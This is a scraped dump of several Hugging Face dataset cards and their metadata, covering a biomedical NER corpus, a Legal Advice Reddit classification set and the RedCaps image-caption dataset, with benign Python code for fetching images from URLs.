### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
### Contributions
Thanks to [@mahajandiwakar](https://github.com/mahajandiwakar) for adding this dataset.
| chintagunta85/bc2gm_test | [
"task_categories:token-classification",
"task_ids:named-entity-recognition",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:10K<n<100K",
"source_datasets:original",
"language:en",
"license:unknown",
"region:us"
] | 2022-07-27T11:20:18+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["en"], "license": ["unknown"], "multilinguality": ["monolingual"], "size_categories": ["10K<n<100K"], "source_datasets": ["original"], "task_categories": ["token-classification"], "task_ids": ["named-entity-recognition"], "pretty_name": "Bc2GmCorpus"} | 2022-07-28T13:16:43+00:00 | [] | [
"en"
] | TAGS
#task_categories-token-classification #task_ids-named-entity-recognition #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-10K<n<100K #source_datasets-original #language-English #license-unknown #region-us
|
# Dataset Card for bc2gm_corpus
## Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage: Github
- Repository: Github
- Paper: NCBI
- Leaderboard:
- Point of Contact:
### Dataset Summary
### Supported Tasks and Leaderboards
### Languages
## Dataset Structure
### Data Instances
### Data Fields
- 'id': Sentence identifier.
- 'tokens': Array of tokens composing a sentence.
- 'ner_tags': Array of tags, where '0' indicates no disease mentioned, '1' signals the first token of a disease and '2' the subsequent disease tokens.
### Data Splits
## Dataset Creation
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @mahajandiwakar for adding this dataset.
| [
"# Dataset Card for bc2gm_corpus",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: Github\n- Repository: Github\n- Paper: NCBI\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'id': Sentence identifier. \n- 'tokens': Array of tokens composing a sentence. \n- 'ner_tags': Array of tags, where '0' indicates no disease mentioned, '1' signals the first token of a disease and '2' the subsequent disease tokens.",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @mahajandiwakar for adding this dataset."
] | [
"TAGS\n#task_categories-token-classification #task_ids-named-entity-recognition #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-10K<n<100K #source_datasets-original #language-English #license-unknown #region-us \n",
"# Dataset Card for bc2gm_corpus",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: Github\n- Repository: Github\n- Paper: NCBI\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'id': Sentence identifier. \n- 'tokens': Array of tokens composing a sentence. \n- 'ner_tags': Array of tags, where '0' indicates no disease mentioned, '1' signals the first token of a disease and '2' the subsequent disease tokens.",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @mahajandiwakar for adding this dataset."
] |
f105b9d763743e20d2f3b8e33f73055ad414e7c5 |
# Dataset Card for Legal Advice Reddit Dataset
## Dataset Description
- **Paper: [Parameter-Efficient Legal Domain Adaptation](https://aclanthology.org/2022.nllp-1.10/)**
- **Point of Contact: [email protected]**
### Dataset Summary
New dataset introduced in [Parameter-Efficient Legal Domain Adaptation](https://aclanthology.org/2022.nllp-1.10) (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as "/r/legaldvice"), sourcing the Reddit posts from the Pushshift
Reddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit
post's "flair" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts
must be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other
samples from the dataset.
### Citation Information
```
@inproceedings{li-etal-2022-parameter,
title = "Parameter-Efficient Legal Domain Adaptation",
author = "Li, Jonathan and
Bhambhoria, Rohan and
Zhu, Xiaodan",
booktitle = "Proceedings of the Natural Legal Language Processing Workshop 2022",
month = dec,
year = "2022",
address = "Abu Dhabi, United Arab Emirates (Hybrid)",
publisher = "Association for Computational Linguistics",
url = "https://aclanthology.org/2022.nllp-1.10",
pages = "119--129",
}
``` | jonathanli/legal-advice-reddit | [
"language:en",
"reddit",
"law",
"region:us"
] | 2022-07-27T19:19:25+00:00 | {"language": ["en"], "pretty_name": "Legal Advice Reddit", "tags": ["reddit", "law"]} | 2023-02-23T16:39:28+00:00 | [] | [
"en"
] | TAGS
#language-English #reddit #law #region-us
|
# Dataset Card for Legal Advice Reddit Dataset
## Dataset Description
- Paper: Parameter-Efficient Legal Domain Adaptation
- Point of Contact: jxl@URL
### Dataset Summary
New dataset introduced in Parameter-Efficient Legal Domain Adaptation (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as "/r/legaldvice"), sourcing the Reddit posts from the Pushshift
Reddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit
post's "flair" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts
must be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other
samples from the dataset.
| [
"# Dataset Card for Legal Advice Reddit Dataset",
"## Dataset Description\n\n- Paper: Parameter-Efficient Legal Domain Adaptation \n- Point of Contact: jxl@URL",
"### Dataset Summary\n\nNew dataset introduced in Parameter-Efficient Legal Domain Adaptation (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as \"/r/legaldvice\"), sourcing the Reddit posts from the Pushshift\nReddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit\npost's \"flair\" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts \nmust be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other \nsamples from the dataset."
] | [
"TAGS\n#language-English #reddit #law #region-us \n",
"# Dataset Card for Legal Advice Reddit Dataset",
"## Dataset Description\n\n- Paper: Parameter-Efficient Legal Domain Adaptation \n- Point of Contact: jxl@URL",
"### Dataset Summary\n\nNew dataset introduced in Parameter-Efficient Legal Domain Adaptation (Li et al., NLLP 2022) from the Legal Advice Reddit community (known as \"/r/legaldvice\"), sourcing the Reddit posts from the Pushshift\nReddit dataset. The dataset maps the text and title of each legal question posted into one of eleven classes, based on the original Reddit\npost's \"flair\" (i.e., tag). Questions are typically informal and use non-legal-specific language. Per the Legal Advice Reddit rules, posts \nmust be about actual personal circumstances or situations. We limit the number of labels to the top eleven classes and remove the other \nsamples from the dataset."
] |
a125fdedddadfc82908c3000165134876eb6a090 | testing an audio dataset | benfoley/test-dataset | [
"region:us"
] | 2022-07-27T22:39:14+00:00 | {} | 2022-07-27T22:41:15+00:00 | [] | [] | TAGS
#region-us
| testing an audio dataset | [] | [
"TAGS\n#region-us \n"
] |
586c8a9acf05865650594e634cb88ef3d4938136 | for trainninf
| Slepp/train | [
"region:us"
] | 2022-07-28T05:56:58+00:00 | {} | 2022-07-28T07:18:50+00:00 | [] | [] | TAGS
#region-us
| for trainninf
| [] | [
"TAGS\n#region-us \n"
] |
f6f04d6b8f8df133c3aa570f81b395b0c99b9fe7 | validation set | Slepp/validation | [
"region:us"
] | 2022-07-28T06:53:43+00:00 | {} | 2022-07-28T07:01:43+00:00 | [] | [] | TAGS
#region-us
| validation set | [] | [
"TAGS\n#region-us \n"
] |
09013b8be5f523de806f9c21c548d2d6e7d92a02 |
# Dataset Card for RedCaps
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Information](#dataset-information)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Information
- **Path** [/home/daniel.baek/public/common/Data](/home/daniel.baek/public/common/Data)
- **Content type** image
- **Tag** sensor, common, ai, dataset
- **Description**
- **Homepage:** [RedCaps homepage](https://redcaps.xyz/)
- **Repository:** [RedCaps repository](https://github.com/redcaps-dataset/redcaps-downloader)
- **Paper:** [RedCaps: web-curated image-text data created by the people, for the people](https://arxiv.org/abs/2111.11431)
- **Leaderboard:**
- **Point of Contact:** [Karan Desai](mailto:[email protected])
### Dataset Summary
RedCaps is a large-scale dataset of 12M image-text pairs collected from Reddit.
Images and captions from Reddit depict and describe a wide variety of objects and scenes.
The data is collected from a manually curated set of subreddits (350 total),
which give coarse image labels and allow steering of the dataset composition
without labeling individual instances. RedCaps data is created *by the people, for the people* – it contains everyday things that users like to share on social media, for example hobbies (r/crafts) and pets (r/shiba). Captions often contain specific and
fine-grained descriptions (northern cardinal, taj mahal). Subreddit names provide relevant image
labels (r/shiba) even when captions may not (mlem!), and sometimes may group many visually
unrelated images through a common semantic meaning (r/perfectfit).
### Dataset Preprocessing
This dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. To fetch the images, use the following code:
```python
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import io
import urllib
import PIL.Image
from datasets import load_dataset
from datasets.utils.file_utils import get_datasets_user_agent
USER_AGENT = get_datasets_user_agent()
def fetch_single_image(image_url, timeout=None, retries=0):
for _ in range(retries + 1):
try:
request = urllib.request.Request(
image_url,
data=None,
headers={"user-agent": USER_AGENT},
)
with urllib.request.urlopen(request, timeout=timeout) as req:
image = PIL.Image.open(io.BytesIO(req.read()))
break
except Exception:
image = None
return image
def fetch_images(batch, num_threads, timeout=None, retries=0):
fetch_single_image_with_args = partial(fetch_single_image, timeout=timeout, retries=retries)
with ThreadPoolExecutor(max_workers=num_threads) as executor:
batch["image"] = list(executor.map(fetch_single_image_with_args, batch["image_url"]))
return batch
num_threads = 20
dset = load_dataset("red_caps", "rabbits_2017")
dset = dset.map(fetch_images, batched=True, batch_size=100, fn_kwargs={"num_threads": num_threads})
```
Some image links point to more than one image. You can process and downloaded those as follows:
```python
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import io
import os
import re
import urllib
import PIL.Image
import datasets
from datasets import load_dataset
from datasets.utils.file_utils import get_datasets_user_agent
USER_AGENT = get_datasets_user_agent()
def fetch_single_image(image_url, timeout=None, retries=0):
for _ in range(retries + 1):
try:
request = urllib.request.Request(
image_url,
data=None,
headers={"user-agent": USER_AGENT},
)
with urllib.request.urlopen(request, timeout=timeout) as req:
image = PIL.Image.open(io.BytesIO(req.read()))
break
except Exception:
image = None
return image
def fetch_images(batch, num_threads, timeout=None, retries=0):
fetch_single_image_with_args = partial(fetch_single_image, timeout=timeout, retries=retries)
with ThreadPoolExecutor(max_workers=num_threads) as executor:
batch["image"] = list(executor.map(lambda image_urls: [fetch_single_image_with_args(image_url) for image_url in image_urls], batch["image_url"]))
return batch
def process_image_urls(batch):
processed_batch_image_urls = []
for image_url in batch["image_url"]:
processed_example_image_urls = []
image_url_splits = re.findall(r"http\S+", image_url)
for image_url_split in image_url_splits:
if "imgur" in image_url_split and "," in image_url_split:
for image_url_part in image_url_split.split(","):
if not image_url_part:
continue
image_url_part = image_url_part.strip()
root, ext = os.path.splitext(image_url_part)
if not root.startswith("http"):
root = "http://i.imgur.com/" + root
root = root.split("#")[0]
if not ext:
ext = ".jpg"
ext = re.split(r"[?%]", ext)[0]
image_url_part = root + ext
processed_example_image_urls.append(image_url_part)
else:
processed_example_image_urls.append(image_url_split)
processed_batch_image_urls.append(processed_example_image_urls)
batch["image_url"] = processed_batch_image_urls
return batch
dset = load_dataset("red_caps", "rabbits_2017")
dset = dset.map(process_image_urls, batched=True, num_proc=4)
features = dset["train"].features.copy()
features["image"] = datasets.Sequence(datasets.Image())
num_threads = 20
dset = dset.map(fetch_images, batched=True, batch_size=100, features=features, fn_kwargs={"num_threads": num_threads})
```
Note that in the above code, we use the `datasets.Sequence` feature to represent a list of images for the multi-image links.
### Supported Tasks and Leaderboards
From the paper:
> We have used our dataset to train deep neural networks that perform image captioning, and
that learn transferable visual representations for a variety of downstream visual recognition tasks
(image classification, object detection, instance segmentation).
> We anticipate that the dataset could be used for a variety of vision-and-language (V&L) tasks,
such as image or text retrieval or text-to-image synthesis.
### Languages
All of the subreddits in RedCaps use English as their primary language.
## Dataset Structure
### Data Instances
Each instance in RedCaps represents a single Reddit image post:
```
{
'image_id': 'bpzj7r',
'author': 'djasz1',
'image_url': 'https://i.redd.it/ho0wntksivy21.jpg',
'raw_caption': 'Found on a friend’s property in the Keys FL. She is now happily living in my house.',
'caption': 'found on a friend's property in the keys fl. she is now happily living in my house.', 'subreddit': 3,
'score': 72,
'created_utc': datetime.datetime(2019, 5, 18, 1, 36, 41),
'permalink': '/r/airplants/comments/bpzj7r/found_on_a_friends_property_in_the_keys_fl_she_is/', 'crosspost_parents': None
}
```
### Data Fields
- `image_id`: Unique alphanumeric ID of the image post (assigned by Reddit).
- `author`: Reddit username of the image post author.
- `image_url`: Static URL for downloading the image associated with the post.
- `raw_caption`: Textual description of the image, written by the post author.
- `caption`: Cleaned version of "raw_caption" by us (see Q35).
- `subreddit`: Name of subreddit where the post was submitted.
- `score`: Net upvotes (discounting downvotes) received by the image post. This field is equal to `None` if the image post is a crosspost.
- `created_utc`: Integer time epoch (in UTC) when the post was submitted to Reddit.
- `permalink`: Partial URL of the Reddit post (https://reddit.com/<permalink>).
- `crosspost_parents`: List of parent posts. This field is optional.
### Data Splits
All the data is contained in training set. The training set has nearly 12M (12,011,111) instances.
From the paper:
> We intend our dataset to be primarily used for pre-training with one or more specific downstream task(s) in mind. Hence, all instances in our dataset would be used for training while
the validation split is derived from downstream task(s). If users require a validation split, we
recommend sampling it such that it follows the same subreddit distribution as entire dataset.
## Dataset Creation
### Curation Rationale
From the paper:
> Large datasets of image-text pairs are widely used for pre-training generic representations
that transfer to a variety of downstream vision and vision-and-language tasks. Existing public
datasets of this kind were curated from search engine results (SBU Captions [1]) or HTML
alt-text from arbitrary web pages (Conceptual Captions [2, 31]). They performed complex
data filtering to deal with noisy web data. Due to aggressive filtering, their data collection is
inefficient and diversity is artificially supressed. We argue that the quality of data depends on
its source, and the human intent behind its creation. In this work, we explore Reddit – a social
media platform, for curating high quality data. We introduce RedCaps – a large dataset of
12M image-text pairs from Reddit. While we expect the use-cases of RedCaps to be similar to
existing datasets, we discuss how Reddit as a data source leads to fast and lightweight collection,
better data quality, lets us easily steer the data distribution, and facilitates ethically responsible data curation.
### Source Data
#### Initial Data Collection and Normalization
From the paper:
> **Data Collection Pipeline**
Reddit’s uniform structure allows us to parallelize data collection as independent tasks – each task
involves collecting posts submitted to a single subreddit in one year. Our collection pipeline has three steps: (1) subreddit selection, (2) image post filtering, and (3) caption cleaning.
**Step 1**. Subreddit selection: We collect data from a manually curated set of subreddits. Subreddits
have their own rules, community norms, and moderators so curating subreddits allows us to steer the
dataset’s composition without annotating individual instances. We select subreddits with a high volume of images posts, where images tend to be photographs (rather than memes, drawings, screenshots,
etc) and post titles tend to describe image content (rather than making jokes, political commentary,
etc). We do not select any NSFW, banned, or quarantined subreddits. We want to minimize the
number of people that appear in RedCaps, so we omit subreddits whose primary purpose is to share or
comment on images of people (such as celebrity pics or user selfies). We choose subreddits focused on
general photography (r/pics, r/itookapicture), animals (r/axolotls, r/birdsofprey, r/dachshund),
plants (r/roses, r/succulents), objects (r/classiccars, r/trains, r/mechanicalkeyboards), food
(r/steak, r/macarons), scenery (r/cityporn1
, r/desertporn), or activities (r/carpentry, r/kayaking).
In total we collect data from 350 subreddits; the full list can be found in Appendix A.
**Step 2**. Image post filtering: We use Pushshift [41] and Reddit [42, 43] APIs to download all image
posts submitted to our selected subreddits from 2008–2020. Posts are collected at least six months
after their creation to let upvotes stabilize. We only collect posts with images hosted on three domains:
Reddit (i.redd.it), Imgur (i.imgur.com), and Flickr (staticflickr.com). Some image posts contain
multiple images (gallery posts) – in this case we only collect the first image and associate it with
the caption. We discard posts with < 2 upvotes to avoid unappealing content, and we discard posts
marked NSFW (by their authors or subreddit moderators) to avoid pornographic or disturbing content.
**Step 3**. Caption cleaning: We expect Reddit post titles to be less noisy than other large-scale
sources of image captions such as alt-text [2, 31], so we apply minimal text cleaning. We lowercase
captions and use ftfy [44] to remove character accents, emojis, and non-latin characters, following
[29, 35, 36]. Then we apply simple pattern matching to discard all sub-strings enclosed in brackets
((.*), [.*]). These sub-strings usually give non-semantic information: original content tags [oc],
image resolutions (800x600 px), camera specs (shot with iPhone), self-promotion [Instagram:
@user], and other references (link in comments). Finally, like [31] we replace social media
handles (words starting with ‘@’) with a [USR] token to protect user privacy and reduce redundancy.
Due to such filtering, ≈12K (0.1%) captions in our dataset are empty strings. We do not discard them,
as subreddit names alone provide meaningful supervision. Unlike CC-3M or CC-12M that discard
captions without nouns or that don’t overlap image tags, we do not discard any instances in this step.
Through this pipeline, we collect 13.4M instances from 350 subreddits. Our collection pipeline is
less resource-intensive than existing datasets – we do not require webpage crawlers, search engines,
or large databases of indexed webpages. RedCaps is easily extensible in the future by selecting more
subreddits and collecting posts from future years. Next, we perform additional filtering to mitigate
user privacy risks and harmful stereotypes in RedCaps, resulting in final size of 12M instances.
#### Who are the source language producers?
Reddit is the singular data source for RedCaps.
### Annotations
#### Annotation process
The dataset is built using fully automatic data collection pipeline which doesn't require any human annotators.
#### Who are the annotators?
The annotation process doesn't require any human annotators.
### Personal and Sensitive Information
From the paper:
> **Does the dataset relate to people?**
The dataset pertains to people in that people wrote the captions and posted images to Reddit
that we curate in RedCaps. We made specific design choices while curating RedCaps to avoid
large quantities of images containing people:
(a) We collect data from manually curated subreddits in which most contain primarily pertains
to animals, objects, places, or activities. We exclude all subreddits whose primary purpose
is to share and describe images of people (such as celebrity photos or user selfies).
(b) We use an off-the-shelf face detector to find and remove images with potential presence of
human faces. We manually checked 50K random images in RedCaps (Q16) and found 79
images with identifiable human faces – the entire dataset may have ≈19K (0.15%) images
with identifiable people. Refer Section 2.2 in the main paper.
> **Is it possible to identify one or more natural persons, either directly or indirectly (i.e., in
combination with other data) from the dataset?**
Yes, all instances in RedCaps include Reddit usernames of their post authors. This could be
used to look up the Reddit user profile, and some Reddit users may have identifying information
in their profiles. Some images may contain human faces which could be identified by
appearance. However, note that all this information is already public on Reddit, and searching it
in RedCaps is no easier than searching directly on Reddit.
> **Were the individuals in question notified about the data collection?**
No. Reddit users are anonymous by default, and are not required to share their personal contact
information (email, phone numbers, etc.). Hence, the only way to notify the authors of RedCaps
image posts is by sending them private messages on Reddit. This is practically difficult to do
manually, and will be classified as spam and blocked by Reddit if attempted to programmatically
send a templated message to millions of users.
> **Did the individuals in question consent to the collection and use of their data?**
Users did not explicitly consent to the use of their data in our dataset. However, by uploading
their data on Reddit, they consent that it would appear on the Reddit plaform and will be
accessible via the official Reddit API (which we use to collect RedCaps).
> **If consent was obtained, were the consenting individuals provided with a mechanism to
revoke their consent in the future or for certain uses?**
Users have full control over the presence of their data in our dataset. If users wish to revoke
their consent, they can delete the underlying Reddit post – it will be automatically removed
dfrom RedCaps since we distributed images as URLs. Moreover, we provide an opt-out request
form on our dataset website for anybody to request removal of an individual instance if it is
potentially harmful (e.g. NSFW, violates privacy, harmful stereotypes, etc.).
## Considerations for Using the Data
### Social Impact of Dataset
From the paper:
> **Has an analysis of the potential impact of the dataset and its use on data subjects (e.g.,
a data protection impact analysis) been conducted?**
No.
### Discussion of Biases
From the paper:
> **Harmful Stereotypes**: Another concern with
Reddit data is that images or language may represent harmful stereotypes about gender, race, or other
characteristics of people [48, 49, 51]. We select only non-NSFW subreddits with active moderation
for collecting data. This stands in contrast to less curated uses of Reddit data, such as GPT-2 [35]
whose training data includes at least 63K documents from banned or quarantined subreddits which
may contain toxic language [53]. We attempt to further reduce harmful stereotypes in two ways:
> * **NSFW images**: We use the InceptionV3 [54] model from [55] to filter images detected as porn or hentai with confidence ≥ 0.9. Similar to face filtering, we estimated precision of our filtering and estimated amount of missed detections, shown in Table 1. The model detects 87K images with low
precision (∼1%) – most detections are non-NSFW images with pink and beige hues.
> * **Potentially derogatory language**: We filter instances whose captions contain words or phrases from a common blocklist [56]. It is important to note that such coarse filtering might suppress language from marginalized groups reclaiming slurs [51]; however, as RedCaps is not intended to describe people, we believe this is a pragmatic tradeoff to avoid propagating harmful labels.
> **Reddit demographics**: Reddit’s user demographics are not representative of the population at large.
Compared to US adults, Reddit users skew male (69% vs 49%), young (58% 18-29 years old vs
22%), college educated (36% vs 28%), and politically liberal (41% vs 25%) [57]. Reddit users
are predominantly white (63%) [57], and 49% of desktop traffic to Reddit comes from the United
States [58]. All of the subreddits in RedCaps use English as their primary language. Taken together,
these demographic biases likely also bias the types of objects and places that appear in images on
Reddit, and the language used to describe these images. We do not offer explicit countermeasures to
these biases, but users of RedCaps should keep in mind that size doesn’t guarantee diversity [51].
Subtler issues may also exist, such as imbalanced representation of demographic groups [59] or
gender bias in object co-occurrence [60] or language [61]. These are hard to control in internet
data, so we release RedCaps with explicit instructions on suitable use-cases; specifically requesting models not be trained to identify people, or make decisions that impact people. We document these instructions and other terms-of-use in a datasheet [45], provided in Appendix G.
> **Does the dataset contain data that, if viewed directly, might be offensive, insulting, threatening, or might otherwise cause anxiety?**
The scale of RedCaps means that we are unable to verify the contents of all images and
captions. However we have tried to minimize the possibility that RedCaps contains data that
might be offensive, insulting, threatening, or might cause anxiety via the following mitigations:
(a) We manually curate the set of subreddits from which to collect data; we only chose
subreddits that are not marked NSFW and which generally contain non-offensive content.
(b) Within our curated subreddits, we did not include any posts marked NSFW.
(c) We removed all instances whose captions contained any of the 400 potentially offensive
words or phrases. Refer Section 2.2 in the main paper.
(d) We remove all instances whose images were flagged NSFW by an off-the-shelf detector.
We manually checked 50K random images in RedCaps and found one image containing
nudity (exposed buttocks; no identifiable face). Refer Section 2.2 in the main paper
> **Does the dataset identify any subpopulations (e.g., by age, gender)?**
RedCaps does not explicitly identify any subpopulations. Since some images contain people
and captions are free-form natural language written by Reddit users, it is possible that some
captions may identify people appearing in individual images as part of a subpopulation.
> **Were any ethical review processes conducted (e.g., by an institutional review board)?**
We did not conduct a formal ethical review process via institutional review boards. However,
as described in Section 2.2 of the main paper and Q16 we employed several filtering mechanisms
to try and remove instances that could be problematic.
### Other Known Limitations
From the paper:
> **Are there any errors, sources of noise, or redundancies in the dataset?**
RedCaps is noisy by design since image-text pairs on the internet are noisy and unstructured.
Some instances may also have duplicate images and captions – Reddit users may have shared
the same image post in multiple subreddits. Such redundancies constitute a very small fraction
of the dataset, and should have almost no effect in training large-scale models.
> **Does the dataset contain data that might be considered confidential (e.g., data that is
protected by legal privilege or by doctor-patient confidentiality, data that includes the
content of individuals non-public communications)?**
No, the subreddits included in RedCaps do not cover topics that may be considered confidential. All posts were publicly shared on Reddit prior to inclusion in RedCaps.
## Additional Information
### Dataset Curators
From the paper:
> Four researchers at the University of Michigan (affiliated as of 2021) have created RedCaps:
Karan Desai, Gaurav Kaul, Zubin Aysola, and Justin Johnson.
### Licensing Information
The image metadata is licensed under CC-BY 4.0 license. Additionally, uses of this dataset are subject to Reddit API terms (https://www.reddit.com/wiki/
api-terms) and users must comply with Reddit User Agreeement, Content Policy,
and Privacy Policy – all accessible at https://www.redditinc.com/policies.
From the paper:
> RedCaps should only be used for non-commercial research. RedCaps should not be used for any tasks that involve identifying features related to people (facial recognition, gender, age, ethnicity identification, etc.) or make decisions that impact people (mortgages, job applications, criminal sentences; or moderation decisions about user-uploaded data that could result in bans from a website). Any commercial and for-profit uses of RedCaps are restricted – it should not be used to train models that will be deployed in production systems as part of a product offered by businesses or government agencies.
### Citation Information
```bibtex
@misc{desai2021redcaps,
title={RedCaps: web-curated image-text data created by the people, for the people},
author={Karan Desai and Gaurav Kaul and Zubin Aysola and Justin Johnson},
year={2021},
eprint={2111.11431},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
```
### Contributions
Thanks to [@mariosasko](https://github.com/mariosasko) for adding this dataset. | actdan2016/sample1 | [
"task_categories:image-to-text",
"task_ids:image-captioning",
"annotations_creators:found",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:10M<n<100M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"arxiv:2111.11431",
"region:us"
] | 2022-07-28T06:58:41+00:00 | {"annotations_creators": ["found"], "language_creators": ["found"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["10M<n<100M"], "source_datasets": ["original"], "task_categories": ["image-to-text"], "task_ids": ["image-captioning"], "paperswithcode_id": "redcaps", "pretty_name": "RedCaps"} | 2022-08-29T01:12:39+00:00 | [
"2111.11431"
] | [
"en"
] | TAGS
#task_categories-image-to-text #task_ids-image-captioning #annotations_creators-found #language_creators-found #multilinguality-monolingual #size_categories-10M<n<100M #source_datasets-original #language-English #license-cc-by-4.0 #arxiv-2111.11431 #region-us
|
# Dataset Card for RedCaps
## Table of Contents
- Table of Contents
- Dataset Information
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Information
- Path /home/URL
- Content type image
- Tag sensor, common, ai, dataset
- Description
- Homepage: RedCaps homepage
- Repository: RedCaps repository
- Paper: RedCaps: web-curated image-text data created by the people, for the people
- Leaderboard:
- Point of Contact: Karan Desai
### Dataset Summary
RedCaps is a large-scale dataset of 12M image-text pairs collected from Reddit.
Images and captions from Reddit depict and describe a wide variety of objects and scenes.
The data is collected from a manually curated set of subreddits (350 total),
which give coarse image labels and allow steering of the dataset composition
without labeling individual instances. RedCaps data is created *by the people, for the people* – it contains everyday things that users like to share on social media, for example hobbies (r/crafts) and pets (r/shiba). Captions often contain specific and
fine-grained descriptions (northern cardinal, taj mahal). Subreddit names provide relevant image
labels (r/shiba) even when captions may not (mlem!), and sometimes may group many visually
unrelated images through a common semantic meaning (r/perfectfit).
### Dataset Preprocessing
This dataset doesn't download the images locally by default. Instead, it exposes URLs to the images. To fetch the images, use the following code:
Some image links point to more than one image. You can process and downloaded those as follows:
Note that in the above code, we use the 'datasets.Sequence' feature to represent a list of images for the multi-image links.
### Supported Tasks and Leaderboards
From the paper:
> We have used our dataset to train deep neural networks that perform image captioning, and
that learn transferable visual representations for a variety of downstream visual recognition tasks
(image classification, object detection, instance segmentation).
> We anticipate that the dataset could be used for a variety of vision-and-language (V&L) tasks,
such as image or text retrieval or text-to-image synthesis.
### Languages
All of the subreddits in RedCaps use English as their primary language.
## Dataset Structure
### Data Instances
